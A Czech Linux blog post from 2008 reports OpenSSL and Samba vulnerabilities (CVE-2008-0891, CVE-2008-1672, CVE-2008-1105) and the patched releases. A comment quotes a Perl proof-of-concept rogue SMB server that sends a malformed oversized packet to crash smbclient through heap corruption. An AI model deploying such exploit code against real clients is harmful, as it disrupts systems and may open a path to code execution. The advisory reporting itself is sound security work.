OpenSSL a Samba / bezpečnostní problémy

AbcLinuxu hledá autory!

Inzerujte na AbcPráce.cz od 950 Kč

Rozšířené hledání

napište » Zprávičky

inzerujte » Pracovní nabídky

Homebrew 4.5.0

včera 20:55 | Nová verze

Homebrew (Wikipedie), správce balíčků pro macOS a od verze 2.0.0 také pro Linux, byl vydán ve verzi 4.5.0. Na stránce Homebrew Formulae lze procházet seznamem balíčků. K dispozici jsou také různé statistiky.

Ladislav Hagara | Komentářů: 0

Firefox 138.0

včera 16:22 | Nová verze

Byl vydán Mozilla Firefox 138.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 138 je již k dispozici také na Flathubu a Snapcraftu.

Ladislav Hagara | Komentářů: 0

Registrace jOpenSpace 2025

včera 15:55 | Pozvánky

Šestnáctý ročník ne-konference jOpenSpace se koná 3. – 5. října 2025 v Hotelu Antoň v Telči. Pro účast je potřeba vyplnit registrační formulář. Ne-konference neznamená, že se organizátorům nechce připravovat program, ale naopak dává prostor všem pozvaným, aby si program sami složili z toho nejzajímavějšího, čím se v poslední době zabývají nebo co je oslovilo. Obsah, který vytvářejí všichni účastníci, se skládá z desetiminutových

… více »

Zdenek H. | Komentářů: 1

ePortál Českého telekomunikačního úřadu

včera 15:44 | IT novinky

Byl spuštěn ePortál Českého telekomunikačního úřadu.

Ladislav Hagara | Komentářů: 2

Richard Stallman na Technické univerzitě v Liberci o vlivu technologií na svobodu

včera 13:55 | Komunita

Richard Stallman přednáší ve středu 7. května od 16:30 na Technické univerzitě v Liberci o vlivu technologií na svobodu. Přednáška je určená jak odborné tak laické veřejnosti.

Ladislav Hagara | Komentářů: 9

Novinky v Kdenlive 25.04.0

28.4. 23:33 | Nová verze

Jean-Baptiste Mardelle se v příspěvku na blogu rozepsal o novinkám v nejnovější verzi 25.04.0 editoru videa Kdenlive (Wikipedie). Ke stažení také na Flathubu.

Ladislav Hagara | Komentářů: 0

TmuxAI, AI asistent pro práci v terminálu

28.4. 17:22 | Zajímavý projekt

TmuxAI (GitHub) je AI asistent pro práci v terminálu. Vyžaduje účet na OpenRouter.

Ladislav Hagara | Komentářů: 0

Trinity Desktop Environment (TDE) R14.1.4

28.4. 17:00 | Nová verze

Byla vydána nová verze R14.1.4 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5, Wikipedie). Přehled novinek i s náhledy v poznámkách k vydání. Podrobný přehled v Changelogu.

Ladislav Hagara | Komentářů: 5

OpenBSD 7.7

27.4. 21:33 | Nová verze

Bylo vydáno OpenBSD 7.7. Opět bez písničky.

Ladislav Hagara | Komentářů: 0

Videozáznamy přednášek z Linux App Summit (LAS)

26.4. 23:00 | Komunita

V Tiraně proběhl letošní Linux App Summit (LAS) (Mastodon). Zatím nesestříhané videozáznamy přednášek jsou k dispozici na YouTube.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 18, poslední 17.4. 12:41

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Blogy / Ride the Raven / GNU/Linux / OpenSSL a Samba / bezpečnostní problémy

Štítky: aktualizace, bug, C, programování, Samba, server

OpenSSL a Samba / bezpečnostní problémy

28.5.2008 18:35 | Přečteno: 2547× | GNU/Linux | poslední úprava: 29.5.2008 17:57

Dnes byly zveřejněny bezpečnostní problémy v OpenSSL SecurityFocus bid 29405 a Sambě SecurityFocus bid 29404. Nová verze OpenSSL 0.9.8h opravuje dva bezpečnostní problémy. Jde o CVE-2008-0891 a CVE-2008-1672. Pokud byla knihovna OpenSSL přeložena s rozšířením "TLS server name" (implicitně vypnuto), může útočník na dálku shodit serverovou službu využívající této knihovny. Druhý problém může být pro změnu zneužít obráceně. Klientská aplikace může být shozena (crash) zákeřným serverem při navazování šifrované komunikace.

Ukázky shození openssl jak klienta (openssl s_client ...), tak i serveru (openssl s_server ...), například na CERT-FI.

Samba dnes také nebyla ušetřena. V oznámení na stránce Secunia.com se píše o přetečení (Buffer Overflow) ve funkci receive_smb_raw() v souboru lib/util_sock.c. Problém byl vývojářům Samby oznámen 15. května a dnes 28. května byl oficiálně zveřejněn. Jedná se o bezpečnostní problém CVE-2008-1105.

V případě, že lze klientskou část obelstít a přinutit ji k navázání spojení se zákeřným serverem, například pouhým kliknutím na odkaz "smb://" nebo zasláním speciálně upraveného datového bloku nmbd serveru, lze ji také (i když zatím pouze teoreticky) přinutit spustit libovolný kód.

Poněvadž serverová část, speciálně proces smbd, může být současně klientem, týká se tento bezpečnostní problém také Samba serveru.

V linuxových distribucích se postupně objevují bezpečnostní aktualizace.
Například RedHat Bug 446724 a bezpečnostní oznámení RHSA-2008-0288 a RHSA-2008-0290.

K dispozici je už také nová verze Samby 3.0.30.

Hodnocení: 100 %

špatné • dobré

Tiskni Sdílej:

Komentáře

Nástroje: Začni sledovat (0) ? , Tisk

Vložit další komentář

2.6.2008 12:46 Ladislav Hagara | skóre: 105 | blog: Ride the Raven
Rozbalit Rozbalit vše Re: OpenSSL a Samba / bezpečnostní problémy

Odpovědět | Sbalit | Link | Blokovat | Admin

Bugtraq ID 29404 (SAMBA) zmiňuje následující POC (Proof Of Concept).

#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}